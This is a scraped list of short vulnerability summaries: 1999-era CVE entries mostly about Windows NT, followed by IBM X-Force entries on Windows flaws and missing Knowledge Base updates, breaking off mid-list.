Windows NT with SYSKEY reuses the keystream that is used for encrypting SAM password hashes, allowing an attacker to crack passwords. [CVE-1999-0993] Modifications to ACLs (Access Control Lists) in Microsoft Exchange 5.5 do not take effect until the directory store cache is refreshed. [CVE-1999-0987] Windows NT does not properly download a system policy if the domain user logs into the domain with a space at the end of the domain name. [CVE-1999-0980] Windows NT Service Control Manager (SCM) allows remote attackers to cause a denial of service via a malformed argument in a resource enumeration request. [CVE-1999-0975] The Windows help system can allow a local user to execute commands as another user by editing a table of contents metafile with a .CNT extension and modifying the topic action to include the commands to be executed when the .hlp file is accessed. [CVE-1999-0969] The Windows NT RPC service allows remote attackers to conduct a denial of service using spoofed malformed RPC packets which generate an error message that is sent to the spoofed host, potentially setting up a loop, aka Snork. [CVE-1999-0967] Buffer overflow in the HTML library used by Internet Explorer, Outlook Express, and Windows Explorer via the res: local resource protocol. [CVE-1999-0945] Buffer overflow in Internet Mail Service (IMS) for Microsoft Exchange 5.5 and 5.0 allows remote attackers to conduct a denial of service via AUTH or AUTHINFO commands. [CVE-1999-0918] Denial of service in various Windows systems via malformed, fragmented IGMP packets. [CVE-1999-0910] Microsoft Site Server and Commercial Internet System (MCIS) do not set an expiration for a cookie, which could then be cached by a proxy and inadvertently used by a different user. [CVE-1999-0909] Multihomed Windows systems allow a remote attacker to bypass IP source routing restrictions via a malformed packet with IP options, aka the "Spoofed Route Pointer" vulnerability. [CVE-1999-0899] The Windows NT 4.0 print spooler allows a local user to execute arbitrary commands due to inappropriate permissions that allow the user to specify an alternate print provider. [CVE-1999-0898] Buffer overflows in Windows NT 4.0 print spooler allow remote attackers to gain privileges or cause a denial of service via a malformed spooler request. [CVE-1999-0886] The security descriptor for RASMAN allows users to point to an alternate location via the Windows NT Service Control Manager. [CVE-1999-0839] Windows NT Task Scheduler installed with Internet Explorer 5 allows a user to gain privileges by modifying the job after it has been scheduled. [CVE-1999-0824] A Windows NT user can use SUBST to map a drive letter to a folder, which is not unmapped after the user logs off, potentially allowing that user to modify the location of folders accessed by later users. [CVE-1999-0815] Memory leak in SNMP agent in Windows NT 4.0 before SP5 allows remote attackers to conduct a denial of service (memory exhaustion) via a large number of queries. [CVE-1999-0794] Microsoft Excel does not warn a user when a macro is present in a Symbolic Link (SYLK) format file. [CVE-1999-0766] The Microsoft Java Virtual Machine allows a malicious Java applet to execute arbitrary commands outside of the sandbox environment. [CVE-1999-0755] Windows NT RRAS and RAS clients cache a user's password even if the user has not selected the "Save password" option. [CVE-1999-0728] A Windows NT user can disable the keyboard or mouse by directly calling the IOCTLs which control them. [CVE-1999-0726] An attacker can conduct a denial of service in Windows NT by executing a program with a malformed file image header. [CVE-1999-0723] The Windows NT Client Server Runtime Subsystem (CSRSS) can be subjected to a denial of service when all worker threads are waiting for user input. [CVE-1999-0721] Denial of service in Windows NT Local Security Authority (LSA) through a malformed LSA request. [CVE-1999-0718] IBM GINA, when used for OS/2 domain authentication of Windows NT users, allows local users to gain administrator privileges by changing the GroupMapping registry key. [CVE-1999-0717] A remote attacker can disable the virus warning mechanism in Microsoft Excel 97. [CVE-1999-0716] Buffer overflow in Windows NT 4.0 help file utility via a malformed help file. [CVE-1999-0701] After an unattended installation of Windows NT 4.0, an installation file could include sensitive information such as the local Administrator password. [CVE-1999-0700] Buffer overflow in Microsoft Phone Dialer (dialer.exe), via a malformed dialer entry in the dialer.ini file. [CVE-1999-0682] Microsoft Exchange 5.5 allows a remote attacker to relay email (i.e. spam) using encapsulated SMTP addresses, even if the anti-relaying features are enabled. [CVE-1999-0680] Windows NT Terminal Server performs extra work when a client opens a new connection but before it is authenticated, allowing for a denial of service. [CVE-1999-0665] An application-critical Windows NT registry key has an inappropriate value. [CVE-1999-0664] An application-critical Windows NT registry key has inappropriate permissions. [CVE-1999-0611] A system-critical Windows NT registry key has an inappropriate value. [CVE-1999-0603] In Windows NT, an inappropriate user is a member of a group, e.g. Administrator, Backup Operators, Domain Admins, Domain Guests, Power Users, Print Operators, Replicators, System Operators, etc. [CVE-1999-0597] A Windows NT account policy does not forcibly disconnect remote users from the server when their logon hours expire. [CVE-1999-0596] A Windows NT log file has an inappropriate maximum size or retention period. [CVE-1999-0595] A Windows NT system does not clear the system page file during shutdown, which might allow sensitive information to be recorded. [CVE-1999-0594] A Windows NT system does not restrict access to removable media drives such as a floppy disk drive or CDROM drive. [CVE-1999-0593] The default setting for the Winlogon key entry ShutdownWithoutLogon in Windows NT allows users with physical access to shut down a Windows NT system without logging in. [CVE-1999-0592] The Logon box of a Windows NT system displays the name of the last user who logged in. [CVE-1999-0591] An event log in Windows NT has inappropriate access permissions. [CVE-1999-0589] A system-critical Windows NT registry key has inappropriate permissions. [CVE-1999-0585] A Windows NT administrator account has the default name of Administrator. [CVE-1999-0584] A Windows NT file system is not NTFS. [CVE-1999-0583] There is a one-way or two-way trust relationship between Windows NT domains. [CVE-1999-0582] A Windows NT account policy has inappropriate, security-critical settings for lockout, e.g. lockout duration, lockout after bad logon attempts, etc. [CVE-1999-0581] The HKEY_CLASSES_ROOT key in a Windows NT system has inappropriate, system-critical permissions. [CVE-1999-0580] The HKEY_LOCAL_MACHINE key in a Windows NT system has inappropriate, system-critical permissions. [CVE-1999-0579] A Windows NT system's registry audit policy does not log an event success or failure for non-critical registry keys. [CVE-1999-0578] A Windows NT system's registry audit policy does not log an event success or failure for security-critical registry keys. [CVE-1999-0577] A Windows NT system's file audit policy does not log an event success or failure for non-critical files or directories. [CVE-1999-0576] A Windows NT system's file audit policy does not log an event success or failure for security-critical files or directories. [CVE-1999-0575] A Windows NT system's user audit policy does not log an event success or failure, e.g. for Logon and Logoff, File and Object Access, Use of User Rights, User and Group Management, Security Policy Changes, Restart, Shutdown, and System, and Process Tracking. [CVE-1999-0572] .reg files are associated with the Windows NT registry editor (regedit), making the registry susceptible to Trojan Horse attacks. [CVE-1999-0570] Windows NT is not using a password filter utility, e.g. PASSFILT.DLL. [CVE-1999-0562] The registry in Windows NT can be accessed remotely by users who are not administrators. [CVE-1999-0560] A system-critical Windows NT file or directory has inappropriate permissions. [CVE-1999-0549] Windows NT automatically logs in an administrator upon rebooting. [CVE-1999-0546] The Windows NT guest account is enabled. [CVE-1999-0535] A Windows NT account policy for passwords has inappropriate, security-critical settings, e.g. for password length, password age, or uniqueness. [CVE-1999-0534] A Windows NT user has inappropriate rights or privileges, e.g. Act as System, Add Workstation, Backup, Change System Time, Create Pagefile, Create Permanent Object, Create Token Name, Debug, Generate Security Audit, Increase Priority, Increase Quota, Load Driver, Lock Memory, Profile Single Process, Remote Shutdown, Replace Process Token, Restore, System Environment, Take Ownership, or Unsolicited Input. [CVE-1999-0506] A Windows NT domain user or administrator account has a default, null, blank, or missing password. [CVE-1999-0505] A Windows NT domain user or administrator account has a guessable password. [CVE-1999-0504] A Windows NT local user or administrator account has a default, null, blank, or missing password. [CVE-1999-0503] A Windows NT local user or administrator account has a guessable password. [CVE-1999-0496] A Windows NT 4.0 user can gain administrative rights by forcing NtOpenProcessToken to succeed regardless of the user's permissions, aka GetAdmin. [CVE-1999-0468] Internet Explorer 5.0 allows a remote server to read arbitrary files on the client's file system using the Microsoft Scriptlet Component. [CVE-1999-0444] Remote attackers can perform a denial of service in Windows machines using malicious ARP packets, forcing a message box display for each packet or filling up log files. [CVE-1999-0419] When the Microsoft SMTP service attempts to send a message to a server and receives a 4xx error code, it quickly and repeatedly attempts to redeliver the message, causing a denial of service. [CVE-1999-0404] Buffer overflow in the Mail-Max SMTP server for Windows systems allows remote command execution. [CVE-1999-0391] The cryptographic challenge of SMB authentication in Windows 95 and Windows 98 can be reused, allowing an attacker to replay the response and impersonate a user. [CVE-1999-0387] A legacy credential caching mechanism used in Windows 95 and Windows 98 systems allows attackers to read plaintext network passwords. [CVE-1999-0382] The screen saver in Windows NT does not verify that its security context has been changed properly, allowing attackers to run programs with elevated privileges. [CVE-1999-0379] Microsoft Taskpads allows remote web sites to execute commands on the visiting user's machine via certain methods that are marked as Safe for Scripting. [CVE-1999-0376] Local users in Windows NT can obtain administrator privileges by changing the KnownDLLs list to reference malicious programs. [CVE-1999-0369] The Sun sdtcm_convert calendar utility for OpenWindows has a buffer overflow which can gain root access. [CVE-1999-0366] In some cases, Service Pack 4 for Windows NT 4.0 can allow access to network shares using a blank password, through a problem with a null NT hash value. [CVE-1999-0364] Microsoft Access 97 stores a database password as plaintext in a foreign mdb, allowing access to data. [CVE-1999-0357] Windows 98 and other operating systems allows remote attackers to cause a denial of service via crafted "oshare" packets, possibly involving invalid fragmentation offsets. [CVE-1999-0345] Jolt ICMP attack causes a denial of service in Windows 95 and Windows NT systems. [CVE-1999-0285] Denial of service in telnet from the Windows NT Resource Kit, by opening then immediately closing a connection. [CVE-1999-0280] Remote command execution in Microsoft Internet Explorer using .lnk and .url files. [CVE-1999-0275] Denial of service in Windows NT DNS servers by flooding port 53 with too many characters. [CVE-1999-0274] Denial of service in Windows NT DNS servers through malicious packet which contains a response to a query that wasn't made. [CVE-1999-0249] Windows NT RSHSVC program allows remote users to execute arbitrary commands. [CVE-1999-0241] Guessable magic cookies in X Windows allows remote attackers to execute commands, e.g. through xterm. [CVE-1999-0229] Denial of service in Windows NT IIS server using ..\.. [CVE-1999-0228] Denial of service in RPCSS.EXE program (RPC Locator) in Windows NT. [CVE-1999-0227] Access violation in LSASS.EXE (LSA/LSARPC) program in Windows NT allows a denial of service. [CVE-1999-0226] Windows NT TCP/IP processes fragmented IP packets improperly, causing a denial of service. [CVE-1999-0225] Windows NT 4.0 allows remote attackers to cause a denial of service via a malformed SMB logon request in which the actual data size does not match the specified size. [CVE-1999-0224] Denial of service in Windows NT messenger service through a long username. [CVE-1999-0200] Windows NT FTP server (WFTP) with the guest account enabled without a password allows an attacker to log into the FTP server using any username and password. [CVE-1999-0179] Windows NT crashes or locks up when a Samba client executes a "cd .." command on a file share. [CVE-1999-0158] Cisco PIX firewall manager (PFM) on Windows NT allows attackers to connect to port 8080 on the PFM server and retrieve any file whose name and location is known. [CVE-1999-0153] Windows 95/NT out of band (OOB) data denial of service through NETBIOS port, aka WinNuke. [CVE-1999-0119] Windows NT 4.0 beta allows users to read and delete shares. SecurityFocus - https://www.securityfocus.com/bid/: [90065] Microsoft Windows Kernel 'Win32k.sys' CVE-2016-0174 Local Privilege Escalation Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [86256] Microsoft Windows Knowledge Base Article 2876063 update is not installed [86097] Microsoft Windows Knowledge Base Article 2859537 update is not installed [86096] Microsoft Windows NTVDM privilege escalation 3 [86095] Microsoft Windows NTVDM privilege escalation 2 [86094] Microsoft Windows NTVDM privilege escalation 1 [86091] Microsoft Windows Knowledge Base Article 2868623 update is not installed [86090] Microsoft Windows ICMPv6 denial of service [86089] Microsoft Windows Knowledge Base Article 2862772 update is not installed [86075] Microsoft Windows Knowledge Base Article 2850869 update is not installed [86074] Microsoft Windows Unicode code execution [86073] Microsoft Windows Knowledge Base Article 2873872 update is not installed [86072] Microsoft Windows Active Directory Federation Services information disclosure [86070] Microsoft Windows Knowledge Base Article 2849568 update is not installed [86069] Microsoft Windows Windows NAT Driver denial of service [85801] Microsoft Windows Movie Maker .wav denial of service [85245] Microsoft Windows Knowledge Base Article 2848295 update is not installed [85244] Microsoft Windows Knowledge Base Article 2847927 update is not installed [85243] Microsoft Windows Knowledge Base Article 2861561 update is not installed [85236] Microsoft Windows Knowledge Base Article 2850851 update is not installed [85234] Microsoft Windows privilege escalation [85233] Microsoft Windows denial of service [85232] Microsoft Windows privilege escalation [85231] Microsoft Windows TrueType font file code execution [85230] Microsoft Windows privilege escalation [85229] Microsoft Windows privilege escalation [85228] Microsoft Windows privilege escalation [85227] Microsoft Windows Knowledge Base Article 2847883 update is not installed [85226] Microsoft Windows Media Format Runtime code execution [85224] Microsoft Windows DefenderCVE-2013-3154 privilege escalation [85223] Microsoft Windows Knowledge Base Article 2846071 update is not installed [85205] Microsoft Windows Knowledge Base Article 2845187 update is not installed [84621] Microsoft Windows Knowledge Base Article 2845690 update is not installed [84620] Microsoft Windows kernel denial of service [84619] Microsoft Windows Knowledge Base Article 2839894 update is not installed [84618] Microsoft Windows Print Spooler privilege escalation [84617] Microsoft Windows Knowledge Base Article 2839571 update is not installed [84615] Microsoft Windows Knowledge Base Article 2839229 update is not installed [84614] Microsoft Windows kernel information disclosure [84613] Microsoft Windows Knowledge Base Article 2838727 update is not installed [84571] Microsoft Windows denial of service [84546] Microsoft Windows Media Player .wav denial of service [84391] Microsoft Windows win32k.sys privilege escalation [84267] Microsoft Windows Update file detected [84156] Microsoft Windows Knowledge Base Article 2847204 update is not installed [83912] Microsoft Windows Knowledge Base Article 2829254 update is not installed [83911] Microsoft Windows denial of service [83910] Microsoft Windows Knowledge Base Article 2829530 update is not installed [83898] Microsoft Windows Knowledge Base Article 2830397 update is not installed [83886] Microsoft Windows Knowledge Base Article 2830399 update is not installed [83884] Microsoft Windows Knowledge Base Article 2834692 update is not installed [83882] Microsoft Windows Knowledge Base Article 2834695 update is not installed [83880] Microsoft Windows Knowledge Base Article 2836440 update is not installed [83876] Microsoft Windows Knowledge Base Article 2840221 update is not installed [83875] Microsoft Windows privilege escalation [83874] Microsoft Windows privilege escalation [83873] Microsoft Windows privilege escalation [83192] Microsoft Windows Knowledge Base Article 2817183 update is not installed [83100] Microsoft Windows Knowledge Base Article 2830914 update is not installed [83099] Microsoft Windows denial of service [83098] Microsoft Windows Knowledge Base Article 2829996 update is not installed [83097] Microsoft Windows privilege escalation [83096] Microsoft Windows privilege escalation [83095] Microsoft Windows denial of service [83094] Microsoft Windows privilege escalation [83093] Microsoft Windows Knowledge Base Article 2828223 update is not installed [83091] Microsoft Windows Knowledge Base Article 2813170 update is not installed [83090] Microsoft Windows privilege escalation [83089] Microsoft Windows privilege escalation [83088] Microsoft Windows Knowledge Base Article 2827663 update is not installed [83086] Microsoft Windows Knowledge Base Article 2823482 update is not installed [83084] Microsoft Windows Knowledge Base Article 2821818 update is not installed [83082] Microsoft Windows Knowledge Base Article 2820917 update is not installed [83081] Microsoft Windows Client/Server Run-time Subsystem privilege escalation [83063] Microsoft Windows Modern Mail spoofing [82776] Microsoft Internet Explorer 10 on Windows 8 sandbox security bypass [82775] Microsoft Windows kernel privilege escalation [82774] Microsoft Windows ASLR and DEP security bypass [82772] Microsoft Windows ASLR security bypass [82769] Microsoft Windows TTF denial of service [82600] Microsoft Windows Knowledge Base Article 2813707 update is not installed [82599] Microsoft Windows Live Essentials information disclosure [82523] RSA Authentication Agent for Microsoft Windows Quick Pin security bypass [82424] Microsoft Windows Knowledge Base Article 2814124 update is not installed [82422] Microsoft Windows Knowledge Base Article 2780176 update is not installed [82417] Microsoft Windows Knowledge Base Article 2801261 update is not installed [82415] Microsoft Windows Knowledge Base Article 2807986 update is not installed [82414] Microsoft Windows USB device privilege escalation [82413] Microsoft Windows USB device privilege escalation [82412] Microsoft Windows USB device privilege escalation [82410] Microsoft Windows Knowledge Base Article 2809289 update is not installed [82401] Microsoft Windows Knowledge Base Article 2813682 update is not installed [82399] Microsoft Windows Knowledge Base Article 2816264 update is not installed [82089] Microsoft Windows ZwSetInformationProcess() denial of service [81859] Microsoft Windows Knowledge Base Article 2802968 update is not installed [81858] Microsoft Windows OLE code execution [81857] Microsoft Windows Knowledge Base Article 2809279 update is not installed [81683] Microsoft Windows Knowledge Base Article 2780091 update is not installed [81682] Microsoft Windows .MPG code execution [81681] Microsoft Windows Knowledge Base Article 2784242 update is not installed [81680] Microsoft Windows Knowledge Base Article 2790113 update is not installed [81679] Microsoft Windows Client/Server Run-time Subsystem memory privilege escalation [81678] Microsoft Windows Knowledge Base Article 2790655 update is not installed [81677] Microsoft Windows TCP/IP sequence denial of service [81676] Microsoft Windows Knowledge Base Article 2790978 update is not installed [81675] Microsoft Windows NFS server denial of service [81674] Microsoft Windows Knowledge Base Article 2797052 update is not installed [81673] Microsoft Windows Vector Markup Language code execution [81672] Microsoft Windows Knowledge Base Article 2799494 update is not installed [81671] Microsoft Windows kernel privilege escalation [81670] Microsoft Windows kernel privilege escalation [81669] Microsoft Windows kernel privilege escalation [81668] Microsoft Windows Knowledge Base Article 2800277 update is not installed [81666] Microsoft Windows Knowledge Base Article 2778344 update is not installed [81665] Microsoft Windows CVE-2013-1277 privilege escalation [81664] Microsoft Windows CVE-2013-1276 privilege escalation [81663] Microsoft Windows CVE-2013-1275 privilege escalation [81662] Microsoft Windows CVE-2013-1274 privilege escalation [81661] Microsoft Windows CVE-2013-1273 privilege escalation [81660] Microsoft Windows CVE-2013-1272 privilege escalation [81659] Microsoft Windows CVE-2013-1271 privilege escalation [81658] Microsoft Windows CVE-2013-1270 privilege escalation [81657] Microsoft Windows CVE-2013-1269 privilege escalation [81656] Microsoft Windows CVE-2013-1268 privilege escalation [81655] Microsoft Windows CVE-2013-1267 privilege escalation [81654] Microsoft Windows CVE-2013-1266 privilege escalation [81653] Microsoft Windows CVE-2013-1265 privilege escalation [81652] Microsoft Windows CVE-2013-1264 privilege escalation [81651] Microsoft Windows CVE-2013-1263 privilege escalation [81650] Microsoft Windows CVE-2013-1262 privilege escalation [81649] Microsoft Windows CVE-2013-1261 privilege escalation [81648] Microsoft Windows CVE-2013-1260 privilege escalation [81647] Microsoft Windows CVE-2013-1259 privilege escalation [81646] Microsoft Windows CVE-2013-1258 privilege escalation [81645] Microsoft Windows CVE-2013-1257 privilege escalation [81644] Microsoft Windows CVE-2013-1256 privilege escalation [81643] Microsoft Windows CVE-2013-1255 privilege escalation [81642] Microsoft Windows CVE-2013-1254 privilege escalation [81641] Microsoft Windows CVE-2013-1253 privilege escalation [81640] Microsoft Windows CVE-2013-1252 privilege escalation [81639] Microsoft Windows CVE-2013-1251 privilege escalation [81638] Microsoft Windows CVE-2013-1250 privilege escalation [81637] Microsoft Windows CVE-2013-1249 privilege escalation [81636] Microsoft Windows CVE-2013-1248 privilege escalation [81634] Microsoft Windows Knowledge Base Article 2792100 update is not installed [81339] Microsoft Windows Knowledge Base Article 2799329 update is not installed [80918] Microsoft Windows digital certificate spoofing [80875] Microsoft Windows Knowledge Base Article 2756145 update is not installed [80874] Microsoft Windows XML code execution [80873] Microsoft Windows XML content code execution [80872] Microsoft Windows Knowledge Base Article 2769324 update is not installed [80869] Microsoft .NET Framework Windows Forms privilege escalation [80867] Microsoft Windows Knowledge Base Article 2769327 update is not installed [80865] Microsoft Windows Knowledge Base Article 2769369 update is not installed [80864] Microsoft Windows print spooler code execution [80863] Microsoft Windows Knowledge Base Article 2778930 update is not installed [80862] Microsoft Windows broadcast privilege escalation [80861] Microsoft Windows Knowledge Base Article 2785220 update is not installed [80860] Microsoft Windows SSL/TLS security bypass [80365] Microsoft Windows Knowledge Base Article 2761465 update is not installed [80360] Microsoft Windows Knowledge Base Article 2765809 update is not installed [80359] Microsoft Windows IPHTTPS security bypass [80358] Microsoft Windows Knowledge Base Article 2770660 update is not installed [80357] Microsoft Windows DirectPlay buffer overflow [80356] Microsoft Windows Knowledge Base Article 2780642 update is not installed [80352] Microsoft Windows Knowledge Base Article 2783534 update is not installed [80351] Microsoft Windows TrueType Fonts files code execution [80350] Microsoft Windows OpenType Font code execution [80349] Microsoft Windows Knowledge Base Article 2784126 update is not installed [79693] Microsoft Windows Knowledge Base Article 2745030 update is not installed [79687] Microsoft Windows Knowledge Base Article 2761451 update is not installed [79683] Microsoft Windows Knowledge Base Article 2761226 update is not installed [79682] Microsoft Windows font code execution [79681] Microsoft Windows kernel privilege escalation [79680] Microsoft Windows kernel privilege escalation [79679] Microsoft Windows Knowledge Base Article 2758857 update is not installed [79678] Microsoft Windows filenames code execution [79677] Microsoft Windows Knowledge Base Article 2727528 update is not installed [79676] Microsoft Windows Briefcase integer overflow [79675] Microsoft Windows Briefcase integer underflow [79648] Microsoft Windows Help Viewer denial of service [79479] Microsoft Windows Media Player .avi denial of service [79124] Microsoft Windows IKE privilege escalation [78864] Microsoft Windows Knowledge Base Article 2754670 update is not installed [78862] Microsoft Windows Knowledge Base Article 2743555 update is not installed [78861] Microsoft Windows Kerberos denial of service [78858] Microsoft Windows Knowledge Base Article 2754849 update is not installed [78856] Microsoft Windows Knowledge Base Article 2724197 update is not installed [78855] Microsoft Windows kernel privilege escalation [78853] Microsoft Windows Knowledge Base Article 2741517 update is not installed [78851] Microsoft Windows Knowledge Base Article 2742319 update is not installed [78848] Microsoft Windows Knowledge Base Article 2742321 update is not installed [78760] Microsoft Windows Knowledge Base Article 2744842 update is not installed [78620] Microsoft Windows Phone 7 domain name spoofing [78077] Microsoft Windows Knowledge Base Article 2741528 update is not installed [78075] Microsoft Windows Knowledge Base Article 2720184 update is not installed [78071] Microsoft Windows Knowledge Base Article 2748552 update is not installed [77512] Microsoft Windows Knowledge Base Article 2740358 update is not installed [77362] Microsoft Windows Knowledge Base Article 2733918 update is not installed [77360] Microsoft Windows Knowledge Base Article 2733829 update is not installed [77357] Microsoft Windows Knowledge Base Article 2733594 update is not installed [77356] Microsoft Windows RAP response packet buffer overflow [77355] Microsoft Windows RAP response packet buffer overflow [77354] Microsoft Windows Print Spooler service format string [77353] Microsoft Windows Remote Administration Protocol denial of service [77352] Microsoft Windows Knowledge Base Article 2731879 update is not installed [77350] Microsoft Windows Knowledge Base Article 2731847 update is not installed [77349] Microsoft Windows memory privilege escalation [77348] Microsoft Windows Knowledge Base Article 2723135 update is not installed [77347] Microsoft Windows Remote Desktop Protocol code execution [77346] Microsoft Windows Knowledge Base Article 2722913 update is not installed [77342] Microsoft Windows Knowledge Base Article 2720573 update is not installed [77341] Microsoft Windows ActiveX control code execution [77325] Microsoft Windows Knowledge Base Article 2719584 update is not installed [77323] Microsoft Windows Knowledge Base Article 2706045 update is not installed [77322] Microsoft Windows VBScript and JScript and Microsoft Internet Explorer object integer overflow [77244] nginx and Microsoft Windows request security bypass [76808] Microsoft Windows Knowledge Base Article 2721015 update is not installed [76725] Microsoft Windows Knowledge Base Article 2722479 update is not installed [76724] Microsoft Windows Knowledge Base Article 2719177 update is not installed [76721] Microsoft Windows Knowledge Base Article 2718523 update is not installed [76720] Microsoft Windows hook procedure privilege escalation [76719] Microsoft Windows keyboard privilege escalation [76718] Microsoft Windows Knowledge Base Article 2698365 update is not installed [76711] Microsoft Windows Knowledge Base Article 2695502 update is not installed [76707] Microsoft Windows search scopes information disclosure [76704] Microsoft Windows Knowledge Base Article 2691442 update is not installed [76703] Microsoft Windows file code execution [76702] Microsoft Windows Knowledge Base Article 2655992 update is not installed [76701] Microsoft Windows TLS information disclosure [76223] Microsoft Windows .otf denial of service [76221] Microsoft Windows XML Core Services code execution [76026] Microsoft Windows Microsoft Certificate Authority spoofing [75963] Microsoft Windows Knowledge Base Article 2699988 update is not installed [75949] Microsoft Windows Knowledge Base Article 2707960 update is not installed [75942] Microsoft Windows Knowledge Base Article 2706726 update is not installed [75939] Microsoft Windows Knowledge Base Article 2685939 update is not installed [75938] Microsoft Windows RDP code execution [75934] Microsoft Windows Knowledge Base Article 2709162 update is not installed [75933] Microsoft Windows thread privilege escalation [75932] Microsoft Windows font privilege escalation [75931] "Microsoft Windows Clipboard Format Atom Name privilege escalation" [75930] Microsoft Windows String Atom Class Name privilege escalation [75929] Microsoft Windows String Atom Class Name privilege escalation [75928] Microsoft Windows Knowledge Base Article 2711167 update is not installed [75927] Microsoft Windows User Mode Scheduler privilege escalation [75926] Microsoft Windows Knowledge Base Article 2709100 update is not installed [75905] Microsoft Windows Knowledge Base Article 2707956 update is not installed [75772] Microsoft Windows keyboard layout privilege escalation [75329] Microsoft Windows xxxCreateWindowEx() denial of service [75140] Microsoft Windows scrollbar calculation privilege escalation [75139] Microsoft Windows Keyboard Layout files privilege escalation [75138] Microsoft Windows messages privilege escalation [75136] Microsoft Windows Knowledge Base Article 2693777 update is not installed [75132] Microsoft Windows Knowledge Base Article 2690533 update is not installed [75131] Microsoft Windows Plug and Play (PnP) privilege escalation [75130] Microsoft Windows Knowledge Base Article 2688338 update is not installed [75129] Microsoft Windows IPv6 address privilege escalation [75128] Microsoft Windows broadcast packets security bypass [75127] Microsoft Windows Knowledge Base Article 2681578 update is not installed [75126] Microsoft Windows GDI+ EMF buffer overflow [75125] Microsoft Windows GDI+ EMF code execution [75124] Microsoft Windows TrueType code execution [75123] Microsoft Windows Knowledge Base Article 2680352 update is not installed [75116] Microsoft Windows Knowledge Base Article 2597981 update is not installed [74556] Microsoft Windows Knowledge Base Article 2639185 update is not installed [74384] Microsoft Windows Knowledge Base Article 2675157 update is not installed [74378] Microsoft Windows Knowledge Base Article 2671605 update is not installed [74373] Microsoft Windows Knowledge Base Article 2664258 update is not installed [74372] Microsoft Windows MSCOMCTL.OCX ActiveX control code execution [74369] Microsoft Windows Knowledge Base Article 2663860 update is not installed [73543] Microsoft Windows Knowledge Base Article 2671387 update is not installed [73542] Microsoft Windows Remote Desktop Protocol denial of service [73541] Microsoft Windows Remote Desktop Protocol code execution [73540] Microsoft Windows Knowledge Base Article 2665364 update is not installed [73538] Microsoft Windows Knowledge Base Article 2651019 update is not installed [73536] Microsoft Windows Knowledge Base Article 2651018 update is not installed [73533] Microsoft Windows Knowledge Base Article 2647170 update is not installed [73532] Microsoft Windows DNS Server denial of service [73530] Microsoft Windows Knowledge Base Article 2641653 update is not installed [73529] Microsoft Windows PostMessage function privilege escalation [73356] Microsoft Windows DNS security bypass [72950] Microsoft Windows IPv6 information disclosure [72887] Microsoft Windows Knowledge Base Article 2663841 update is not installed [72873] Microsoft Windows Knowledge Base Article 2663830 update is not installed [72867] Microsoft Windows Knowledge Base Article 2663510 update is not installed [72857] Microsoft Windows Knowledge Base Article 2661637 update is not installed [72855] Microsoft Windows Knowledge Base Article 2660465 update is not installed [72854] Microsoft Windows keyboard privilege escalation [72853] Microsoft Windows Knowledge Base Article 2653956 update is not installed [72852] Microsoft Windows Authenticode code execution [72851] Microsoft Windows Knowledge Base Article 2654428 update is not installed [72850] Microsoft Windows msvcrt dynamic link library buffer overflow [72849] Microsoft Windows Knowledge Base Article 2651026 update is not installed [72846] Microsoft Windows Knowledge Base Article 2647516 update is not installed [72841] Microsoft Windows Knowledge Base Article 2645640 update is not installed [72840] Microsoft Windows Ancillary Function Driver privilege escalation [72839] Microsoft Windows Ancillary Function Driver privilege escalation [72838] Microsoft Windows Knowledge Base Article 2643719 update is not installed [72560] Microsoft Windows Media Format ASF invalid stream [72346] Microsoft Windows Explorer denial of service [72029] Microsoft Windows Knowledge Base Article 2638420 update is not installed [72003] Microsoft Windows Knowledge Base Article 2646524 update is not installed [72002] Microsoft Windows Client/Server Run-time Subsystem Unicode privilege escalation [71998] Microsoft Windows Knowledge Base Article 2644615 update is not installed [71997] Microsoft Windows SafeSEH security bypass [71995] Microsoft Windows Knowledge Base Article 2643584 update is not installed [71994] Microsoft Windows Knowledge Base Article 2636391 update is not installed [71993] Microsoft Windows DirectShow code execution [71992] Microsoft Windows Media Player MIDI code execution [71991] Microsoft Windows Knowledge Base Article 2607664 update is not installed [71966] Microsoft Windows Media Player access denial of service [71944] Microsoft Windows Phone messages denial of service [71873] Microsoft Windows win32k.sys code execution [71733] Microsoft Windows sandbox privilege escalation [71565] Microsoft Windows Knowledge Base Article 2648048 update is not installed [71564] Microsoft Windows Media Player DVR-MS code execution [71562] Microsoft Windows Knowledge Base Article 2640241 update is not installed [71560] Microsoft Windows Knowledge Base Article 2640045 update is not installed [71559] Microsoft Windows Active Directory buffer overflow [71558] Microsoft Windows Knowledge Base Article 2639417 update is not installed [71557] Microsoft Windows Knowledge Base Article 2639142 update is not installed [71554] Microsoft Windows Knowledge Base Article 2633171 update is not installed [71553] Microsoft Windows kernel privilege escalation [71552] Microsoft Windows Knowledge Base Article 2624667 update is not installed [71551] Microsoft Windows OLE object code execution [71550] Microsoft Windows Knowledge Base Article 2620712 update is not installed [71549] Microsoft Windows Client/Server Run-time Subsystem Csrsrv.dll privilege escalation [71548] Microsoft Windows Knowledge Base Article 2618451 update is not installed [71546] Microsoft Windows Knowledge Base Article 2618444 update is not installed [71542] Microsoft Windows Knowledge Base Article 2607702 update is not installed [71538] Microsoft Windows Knowledge Base Article 2590602 update is not installed [71418] Microsoft Windows keyboard layout denial of service [71291] Microsoft Windows Server AppLocker security bypass [71073] Microsoft Windows kernel Duqu code execution [70951] Microsoft Windows Knowledge Base Article 2630837 update is not installed [70950] Microsoft Windows Active Directory privilege escalation [70949] Microsoft Windows Knowledge Base Article 2620704 update is not installed [70948] Microsoft Windows Mail and Windows Meeting Space code execution [70947] Microsoft Windows Knowledge Base Article 2617657 update is not installed [70946] Microsoft Windows TrueType denial of service [70945] Microsoft Windows Knowledge Base Article 2603381 update is not installed [70944] Microsoft Windows Object Packager code execution [70943] Microsoft Windows Knowledge Base Article 2588516 update is not installed [70942] Microsoft Windows TCP/IP code execution [70940] Microsoft Windows ClickOnce code execution [70152] Microsoft Windows Knowledge Base Article 2623699 update is not installed [70150] Microsoft Windows Knowledge Base Article 2607670 update is not installed [70143] Microsoft Windows Media Center DLL code execution [70140] Microsoft Windows Knowledge Base Article 2652016 update is not installed [70137] Microsoft Windows Ancillary Function Driver privilege escalation [70130] Microsoft Windows Knowledge Base Article 2586448 update is not installed [70115] Microsoft Windows Knowledge Base Article 2567053 update is not installed [70114] Microsoft Windows use-after-free privilege escalation [70113] Microsoft Windows .fon buffer overflow [70112] Microsoft Windows TrueType denial of service [69638] Microsoft Windows csrss.exe denial of service [69558] Microsoft Windows Script Host DLL code execution [69501] Microsoft Windows Knowledge Base Article 2587634 update is not installed [69498] Microsoft Windows Knowledge Base Article 2587505 update is not installed [69492] Microsoft Windows Knowledge Base Article 2571621 update is not installed [69491] Microsoft Windows WINS privilege escalation [69490] 